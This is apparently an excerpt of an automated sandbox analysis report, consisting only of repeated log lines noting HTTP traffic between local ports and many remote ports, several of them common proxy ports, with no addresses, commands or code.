                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 29624
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 9300
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 44439
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 3129
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 65032
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4006
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 5088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 17158
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 17464
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 16203
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 3060
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 8899
                Source: unknownNetwork traffic detected: HTTP traffic on port 65032 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 29057
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 8449
                Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 27020
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 50364 -> 46648
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 17464
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 2572
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 8118
                Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 9400
                Source: unknownNetwork traffic detected: HTTP traffic on port 50418 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50355 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 10599
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50276
                Source: unknownNetwork traffic detected: HTTP traffic on port 50367 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 17158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50518 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 6116
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50179
                Source: unknownNetwork traffic detected: HTTP traffic on port 50579 -> 3129
                Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 50433 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 9353
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 11546
                Source: unknownNetwork traffic detected: HTTP traffic on port 50542 -> 10006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 50263
                Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 50631 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50681 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 8089
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 17464
                Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50495 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50188
                Source: unknownNetwork traffic detected: HTTP traffic on port 50613 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50687 -> 56370
                Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 11320
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 9400 -> 50249
                Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50648 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50681
                Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50542
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 3155
                Source: unknownNetwork traffic detected: HTTP traffic on port 50703 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50631
                Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 63819
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9080 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50768 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50418
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 2572
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 16203
                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 59609
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50433
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 29057
                Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50823 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 27020
                Source: unknownNetwork traffic detected: HTTP traffic on port 50892 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50740
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50495
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 51612
                Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 40330
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50565 -> 9990
                Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 54066
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50773 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50967 -> 22500
                Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 17158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50518
                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 51499
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 63010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50902 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50826 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 8826
                Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50549
                Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 53777
                Source: unknownNetwork traffic detected: HTTP traffic on port 51019 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 11320
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50977 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51026 -> 10003
                Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 21861
                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 31745
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 30993
                Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51162 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 8090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51044 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 51109 -> 37847
                Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 10824
                Source: unknownNetwork traffic detected: HTTP traffic on port 50891 -> 53778
                Source: unknownNetwork traffic detected: HTTP traffic on port 51136 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51041 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 30747
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 51118 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51117 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51019
                Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 8787
                Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 63819
                Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 55806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 41385
                Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 51026
                Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 59609
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50977
                Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51123 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 51299 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 11546
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 63010
                Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 61818
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 50886
                Source: unknownNetwork traffic detected: HTTP traffic on port 51240 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51148 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51077 -> 30670
                Source: unknownNetwork traffic detected: HTTP traffic on port 51277 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51312 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51247 -> 2324
                Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 61792
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 62310
                Source: unknownNetwork traffic detected: HTTP traffic on port 51353 -> 39272
                Source: unknownNetwork traffic detected: HTTP traffic on port 51238 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50285 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50437 -> 19693
                Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51367 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 12403
                Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 51387 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 15097
                Source: unknownNetwork traffic detected: HTTP traffic on port 51382 -> 9123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50946 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51388 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 50565
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50957
                Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 22653
                Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 11320
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50186
                Source: unknownNetwork traffic detected: HTTP traffic on port 51335 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50523 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 12334
                Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50935
                Source: unknownNetwork traffic detected: HTTP traffic on port 51386 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51370 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51076
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51076
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51348
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50984
                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 33551
                Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51240
                Source: unknownNetwork traffic detected: HTTP traffic on port 51505 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51451 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51517 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51515 -> 10003
                Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 51384
                Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 51382
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 51499
                Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51419 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 51473 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 55806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 59609
                Source: unknownNetwork traffic detected: HTTP traffic on port 51465 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 9401
                Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 33383
                Source: unknownNetwork traffic detected: HTTP traffic on port 51544 -> 1337
                Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 8826
                Source: unknownNetwork traffic detected: HTTP traffic on port 51602 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 51148
                Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 2324
                Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 8787
                Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 63819
                Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51494 -> 3629
                Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51507 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 32210
                Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51609 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 6004
                Source: unknownNetwork traffic detected: HTTP traffic on port 51601 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51603 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 51515
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 34409
                Source: unknownNetwork traffic detected: HTTP traffic on port 51056 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51579 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51541 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51581 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 29380
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50906
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51242
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49924
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 50846 -> 33899
                Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51370
                Source: unknownNetwork traffic detected: HTTP traffic on port 51650 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 27020
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 16203
                Source: unknownNetwork traffic detected: HTTP traffic on port 1337 -> 51544
                Source: unknownNetwork traffic detected: HTTP traffic on port 50891 -> 53778
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 51671 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 4154
                Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 50942 -> 29466
                Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 8089
                Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 48298
                Source: unknownNetwork traffic detected: HTTP traffic on port 51481 -> 10081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51558 -> 65533
                Source: unknownNetwork traffic detected: HTTP traffic on port 51767 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 61792
                Source: unknownNetwork traffic detected: HTTP traffic on port 51353 -> 39272
                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 15280
                Source: unknownNetwork traffic detected: HTTP traffic on port 51736 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51732 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51737 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51743 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 22942
                Source: unknownNetwork traffic detected: HTTP traffic on port 50744 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 51535 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 63010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 19925
                Source: unknownNetwork traffic detected: HTTP traffic on port 51672 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 51395
                Source: unknownNetwork traffic detected: HTTP traffic on port 51794 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51772 -> 35254
                Source: unknownNetwork traffic detected: HTTP traffic on port 51599 -> 3629
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51581
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
